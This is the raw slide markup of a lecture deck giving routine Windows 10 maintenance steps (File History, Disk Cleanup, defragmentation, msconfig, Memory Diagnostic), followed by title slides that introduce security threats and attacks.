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8"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="263" r:id="rId5"/>
    <p:sldId id="268" r:id="rId6"/>
    <p:sldId id="270" r:id="rId7"/>
    <p:sldId id="271" r:id="rId8"/>
    <p:sldId id="272" r:id="rId9"/>
    <p:sldId id="273" r:id="rId10"/>
    <p:sldId id="274" r:id="rId11"/>
    <p:sldId id="275" r:id="rId12"/>
    <p:sldId id="276" r:id="rId13"/>
    <p:sldId id="278" r:id="rId14"/>
    <p:sldId id="279" r:id="rId15"/>
    <p:sldId id="290" r:id="rId16"/>
    <p:sldId id="291" r:id="rId17"/>
    <p:sldId id="259" r:id="rId18"/>
    <p:sldId id="260" r:id="rId19"/>
    <p:sldId id="261" r:id="rId20"/>
    <p:sldId id="262" r:id="rId21"/>
    <p:sldId id="292" r:id="rId22"/>
    <p:sldId id="264" r:id="rId23"/>
    <p:sldId id="265" r:id="rId24"/>
    <p:sldId id="266" r:id="rId25"/>
    <p:sldId id="267" r:id="rId26"/>
    <p:sldId id="293" r:id="rId27"/>
    <p:sldId id="269" r:id="rId28"/>
    <p:sldId id="294" r:id="rId29"/>
    <p:sldId id="295" r:id="rId30"/>
    <p:sldId id="296" r:id="rId31"/>
    <p:sldId id="297" r:id="rId32"/>
    <p:sldId id="298" r:id="rId33"/>
    <p:sldId id="299" r:id="rId34"/>
    <p:sldId id="300" r:id="rId35"/>
    <p:sldId id="277" r:id="rId36"/>
    <p:sldId id="301" r:id="rId37"/>
    <p:sldId id="302" r:id="rId38"/>
    <p:sldId id="303" r:id="rId39"/>
    <p:sldId id="304" r:id="rId40"/>
    <p:sldId id="305" r:id="rId41"/>
    <p:sldId id="306" r:id="rId42"/>
    <p:sldId id="307" r:id="rId43"/>
    <p:sldId id="308" r:id="rId44"/>
    <p:sldId id="309" r:id="rId45"/>
    <p:sldId id="310" r:id="rId46"/>
    <p:sldId id="280" r:id="rId47"/>
    <p:sldId id="281" r:id="rId48"/>
    <p:sldId id="282" r:id="rId49"/>
    <p:sldId id="283" r:id="rId50"/>
    <p:sldId id="284" r:id="rId51"/>
    <p:sldId id="285" r:id="rId52"/>
    <p:sldId id="286" r:id="rId53"/>
    <p:sldId id="287" r:id="rId54"/>
    <p:sldId id="288" r:id="rId55"/>
    <p:sldId id="311" r:id="rId56"/>
    <p:sldId id="289" r:id="rId57"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Merriweather" panose="00000500000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId59"/>
      <p:bold r:id="rId60"/>
      <p:italic r:id="rId61"/>
      <p:boldItalic r:id="rId62"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Slab" pitchFamily="2"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jU/bLC0BfZBtKoeyurvVSbU7rw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5" d="100"/>
          <a:sy n="135" d="100"/>
        </p:scale>
        <p:origin x="84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a5eb945af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ea5eb945a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ca6215655_0_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eca6215655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a5eb945af_0_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ea5eb945a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ca6215655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eca621565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a5eb945af_0_2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ea5eb945af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eca6215655_0_1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eca6215655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ea5eb945af_0_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ea5eb945a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ec801cac4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ec801cac4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c801cac4e_0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2ec801cac4e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c801cac4e_0_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ec801cac4e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ec801cac4e_0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2ec801cac4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ec801cac4e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2ec801cac4e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ec801cac4e_0_5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2ec801cac4e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c801cac4e_0_6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g2ec801cac4e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ea5eb945af_0_5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ea5eb945a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ea5eb945af_0_4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2ea5eb945af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ea5eb945af_0_13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2ea5eb945af_0_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ea5eb945af_0_6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2ea5eb945af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ea5eb945af_0_1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2ea5eb945af_0_1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ea5eb945af_0_7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2ea5eb945af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ea5eb945af_0_8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2ea5eb945af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ea5eb945af_0_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2ea5eb945af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ea5eb945af_0_1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2ea5eb945af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ea5eb945af_0_16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ea5eb945af_0_1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ea5eb945af_0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2ea5eb945af_0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ea5eb945af_0_1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2ea5eb945af_0_1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ca6215655_0_3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g2eca6215655_0_3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a5eb945af_0_19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ea5eb945af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ea5eb945af_0_1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2ea5eb945af_0_1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36"/>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36"/>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36"/>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36"/>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36"/>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36"/>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6"/>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36"/>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6"/>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36"/>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6"/>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6"/>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6"/>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6"/>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6"/>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45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-26550" y="-14850"/>
            <a:ext cx="9197100" cy="5173200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CFD8DC">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8"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Google Shape;29;p38"/>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0" name="Google Shape;30;p38"/>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31" name="Google Shape;31;p38"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3839646" y="782918"/>
            <a:ext cx="1464573" cy="842707"/>
            <a:chOff x="3593400" y="1729675"/>
            <a:chExt cx="1957200" cy="1123610"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Google Shape;32;p38"/>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Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>“</a:t>
              </a:r>
              <a:endParaRPr sz="6000" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Google Shape;33;p38"/>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38"/>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35" name="Google Shape;35;p38"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="33"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36" name="Google Shape;36;p38"/>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37" name="Google Shape;37;p38"/>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38" name="Google Shape;38;p38"/>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39"/>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1" name="Google Shape;41;p39"/>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40"/>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4" name="Google Shape;44;p40"/>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45" name="Google Shape;45;p4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8" name="Google Shape;48;p41"/>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49" name="Google Shape;49;p41"/>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50" name="Google Shape;50;p4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4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3" name="Google Shape;53;p42"/>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4" name="Google Shape;54;p42"/>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5" name="Google Shape;55;p42"/>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6" name="Google Shape;56;p4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4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4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44"/>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2" name="Google Shape;62;p44"/>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35"/>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accent4"/>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3581700" y="337200"/>
            <a:ext cx="5562300" cy="1398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marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="5800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="198754"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lecture : 14</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="71" name="Google Shape;71;p1"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>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10</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="251" name="Google Shape;251;p1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9"/>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9"/>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Revert to previous versions of files</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="254" name="Google Shape;254;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600850" y="837113"/>
            <a:ext cx="7591200" cy="2037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To do this, right click the Start button, and then select Control Panel &gt; System and Security &gt; File History, and then click ‘Restore personal files’ in the left panel.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You’ll be presented with all the files that have been saved by File History, with each version present as far back as it ‘remembers’. (If File History isn’t turned on, Windows will tell you, and offer up a link to configure it – you can then start using the feature going forward).</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="255" name="Google Shape;255;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600850" y="2874125"/>
            <a:ext cx="4374000" cy="19086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Alternatively, to revert specific files, right click on the file in question, head to Properties and select the Previous Versions tab. A list of all the different versions will be there, so simply find the correct one and open it. </a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="256" name="Google Shape;256;p19"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5418175" y="2994350"/>
            <a:ext cx="2773875" cy="1668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11</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="262" name="Google Shape;262;p2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2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2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Disk Cleanup in Windows 10</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="265" name="Google Shape;265;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600850" y="837113"/>
            <a:ext cx="7591200" cy="24216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Go to the Start menu and search for "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Disk Cleanup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>".</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Select the drive you want to clean up and click "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>OK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>".</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Check the boxes next to the types of files you want to delete (e.g. Temporary files, Recycle Bin, etc.).</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Click "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>OK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>" to confirm and delete the selected files.</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Evaluate the results: check the amount of disk space that has been freed up.</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="266" name="Google Shape;266;p20"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2745525" y="3165717"/>
            <a:ext cx="3414600" cy="17634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12</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272" name="Google Shape;272;p2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21"/>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1"/>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Disk Defragmenter in Windows 10</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275" name="Google Shape;275;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600850" y="932400"/>
            <a:ext cx="4395600" cy="3032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Go to the Start menu and search for "Defragment and Optimize Drives".</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Select the drive you want to defragment and click "Optimize".</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Wait for the defragmentation process to complete.</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Evaluate the results: check the performance of the drive and compare it to before defragmentation.</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="276" name="Google Shape;276;p21"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5216691" y="1077775"/>
            <a:ext cx="3617064" cy="298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13</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="292" name="Google Shape;292;p2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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1685275" y="200975"/>
            <a:ext cx="57435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23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1926175" y="200975"/>
            <a:ext cx="5502600" cy="504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200" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="198754"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>System Configuration in Windows 10</a:t>
            </a:r>
            <a:endParaRPr sz="2200" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="295" name="Google Shape;295;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600850" y="837113"/>
            <a:ext cx="7591200" cy="32889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Press the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Windows key+R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t> to open the Run dialog box.</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Type "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>msconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>" and press Enter to open System Configuration.</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Navigate to the "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Services</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>" tab to view all of the services that are currently running on your computer.</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Navigate to the "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Startup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>" tab to view all of the programs that are set to run at startup.</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Uncheck any services or programs that are unnecessary to improve performance.</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Evaluate the results: check the performance of your computer after disabling unnecessary services and startup programs.</a:t>
            </a:r>
            <a:endParaRPr sz="16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14</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="301" name="Google Shape;301;p2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4"/>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4"/>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Windows Memory Diagnostic</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="304" name="Google Shape;304;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600850" y="919575"/>
            <a:ext cx="3881100" cy="27861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Go to the Start menu and search for "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Windows Memory Diagnostic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>".</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Select "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Restart now and check for problems (recommended)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>".</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Wait for the scan to complete.</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Evaluate the results: check for any memory errors that are reported by the tool.</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="305" name="Google Shape;305;p24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4690228" y="983875"/>
            <a:ext cx="4079250" cy="3299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l="24460" t="8716" r="11305" b="8969"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5236150" y="1425725"/>
            <a:ext cx="3350425" cy="3468275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="Google Shape;77;p2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="671625" y="1115525"/>
            <a:ext cx="4656900" cy="1518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chemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Roboto Slab"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700" b="1">
                <a:solidFill>
                  <a:srgbClr val="198754"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Program Threats,</a:t>
            </a:r>
            <a:endParaRPr sz="27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2700" b="1">
                <a:solidFill>
                  <a:srgbClr val="198754"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security Violation Method</a:t>
            </a:r>
            <a:endParaRPr sz="27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2700" b="1">
                <a:solidFill>
                  <a:srgbClr val="198754"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security Attacks,</a:t>
            </a:r>
            <a:endParaRPr sz="2700" b="1">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Roboto Slab"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700" b="1">
                <a:solidFill>
                  <a:srgbClr val="198754"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security Measure Level</a:t>
            </a:r>
            <a:endParaRPr sz="2700" b="1">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="Google Shape;78;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15</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="19875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16</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Google Shape;84;p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The Security Problem</a:t>
            </a:r>
